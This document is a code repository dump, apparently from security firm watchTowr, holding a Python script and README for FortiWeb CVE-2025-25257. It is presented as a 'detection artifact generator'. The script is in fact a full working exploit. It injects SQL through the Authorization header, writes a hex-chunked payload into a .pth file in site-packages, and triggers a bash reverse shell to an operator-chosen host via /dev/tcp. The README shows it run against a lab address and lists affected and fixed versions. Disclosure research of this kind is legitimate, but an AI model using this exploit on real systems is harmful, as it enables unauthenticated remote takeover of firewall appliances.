├── watchTowr-vs-FortiWeb-CVE-2025-25257.py └── README.md /watchTowr-vs-FortiWeb-CVE-2025-25257.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 3 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 4 | import argparse 5 | import binascii 6 | import random 7 | from time import sleep 8 | banner = """ __ ___ ___________ 9 | __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ 10 | \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\ 11 | \\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/ 12 | \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| 13 | \\/ \\/ \\/ 14 | 15 | watchTowr-vs-FortiWeb-CVE-2025-25257.py 16 | 17 | (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator 18 | 19 | - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber) 20 | 21 | CVEs: [CVE-2025-25257] 22 | """ 23 | print(banner) 24 | 25 | parser = argparse.ArgumentParser(description='Detection Artifact Generator for CVE-2025-25257') 26 | parser.add_argument('--target', required=True, help='Target URL') 27 | parser.add_argument('--lhost', required=True) 28 | parser.add_argument('--lport', required=True) 29 | args = parser.parse_args() 30 | 31 | args.command = f"""import os; os.system('bash -c "/bin/bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"')""" 32 | args.target = args.target.rstrip('/') 33 | 34 | s = requests.Session() 35 | s.verify = False 36 | 37 | def build_token_updates(encoded_hex: str, chunk_size: int = 10): 38 | if chunk_size % 2 != 0: 39 | print("[!] chunk size must be even bro") 40 | exit(1) 41 | 42 | chunks = [encoded_hex[i : i + chunk_size] 43 | for i in range(0, len(encoded_hex), chunk_size)] 44 | 45 | for idx, piece in enumerate(chunks): 46 | if idx == 0: 47 | sql = ( 48 | f"SET/**/token=UNHEX('{piece}')" 49 | ) 50 | else: 51 | sql = ( 52 | f"SET/**/token=CONCAT(token,UNHEX('{piece}'))" 53 | ) 54 | 55 | payload = ( 56 | f"Bearer '/**/;UPDATE/**/fabric_user.user_table/**/" 57 | f"{sql};SELECT/**/'1'" 58 | ) 59 | s.headers.update({'Authorization': payload}) 60 | s.get(f"{args.target}/api/fabric/device/status") 61 | print(f"[*] sprayed chunk #{idx+1}/{len(chunks)}:\t{piece!r}") 62 | sleep(1) 63 | 64 | encoded_command = binascii.hexlify(args.command.encode()).decode() 65 | build_token_updates(encoded_command) 66 | 67 | s.headers.update({ 68 | 'Authorization': f"Bearer '/**/UNION/**/SELECT/**/token/**/from/**/fabric_user.user_table/**/into/**/outfile/**/'../../lib/python3.10/site-packages/x.pth" 69 | }) 70 | 71 | s.get(f"{args.target}/api/fabric/device/status") 72 | 73 | print("\n[*] Pop thy shell!") 74 | s.headers.pop('Authorization', None) 75 | s.head(f"{args.target}/cgi-bin/ml-draw.py") -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # watchTowr-vs-FortiWeb-CVE-2025-25257 2 | 3 | Detection Artifact Generator for FortiWeb CVE-2025-25257 4 | 5 | 6 | See our [blog post](https://labs.watchtowr.com/) for technical details 7 | 8 | 9 | 10 | https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194 11 | 12 | 13 | 14 | # Detection in Action 15 | 16 | ``` 17 | python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350 18 | __ ___ ___________ 19 | __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ 20 | \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ 21 | \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ 22 | \/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__| 23 | \/ \/ \/ 24 | 25 | watchTowr-vs-FortiWeb-CVE-2025-25257.py 26 | 27 | (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator 28 | 29 | - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber) 30 | 31 | CVEs: [CVE-2025-25257] 32 | 33 | [*] sprayed chunk #1/17: '696d706f72' 34 | [*] sprayed chunk #2/17: '74206f733b' 35 | [*] sprayed chunk #3/17: '206f732e73' 36 | [*] sprayed chunk #4/17: '797374656d' 37 | [*] sprayed chunk #5/17: '2827626173' 38 | [*] sprayed chunk #6/17: '68202d6320' 39 | [*] sprayed chunk #7/17: '222f62696e' 40 | [*] sprayed chunk #8/17: '2f62617368' 41 | [*] sprayed chunk #9/17: '202d69203e' 42 | [*] sprayed chunk #10/17: '26202f6465' 43 | [*] sprayed chunk #11/17: '762f746370' 44 | [*] sprayed chunk #12/17: '2f3139322e' 45 | [*] sprayed chunk #13/17: '3136382e38' 46 | [*] sprayed chunk #14/17: '2e3134382f' 47 | [*] sprayed chunk #15/17: '3133353020' 48 | [*] sprayed chunk #16/17: '303e263122' 49 | [*] sprayed chunk #17/17: '2729' 50 | 51 | [*] Pop thy shell! 52 | 53 | ``` 54 | 55 | # Description 56 | 57 | This script attempts to detect if FortiWeb is vulnerable to CVE-2025-25257 58 | 59 | # Affected Versions 60 | 61 | The following versions of FortiWeb are Affected 62 | 63 | | Version | Affected | Solution | 64 | | ------------ | -------------------- | -------------------------- | 65 | | FortiWeb 7.6 | 7.6.0 through 7.6.3 | Upgrade to 7.6.4 or above | 66 | | FortiWeb 7.4 | 7.4.0 through 7.4.7 | Upgrade to 7.4.8 or above | 67 | | FortiWeb 7.2 | 7.2.0 through 7.2.10 | Upgrade to 7.2.11 or above | 68 | | FortiWeb 7.0 | 7.0.0 through 7.0.10 | Upgrade to 7.0.11 or above | 69 | 70 | For more information visit [FortiGuard Labs PSIRT](https://fortiguard.fortinet.com/psirt/FG-IR-25-151) 71 | 72 | 73 | # Follow [watchTowr](https://watchTowr.com) Labs 74 | 75 | For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 76 | 77 | - https://labs.watchtowr.com/ 78 | - https://x.com/watchtowrcyber 79 | --------------------------------------------------------------------------------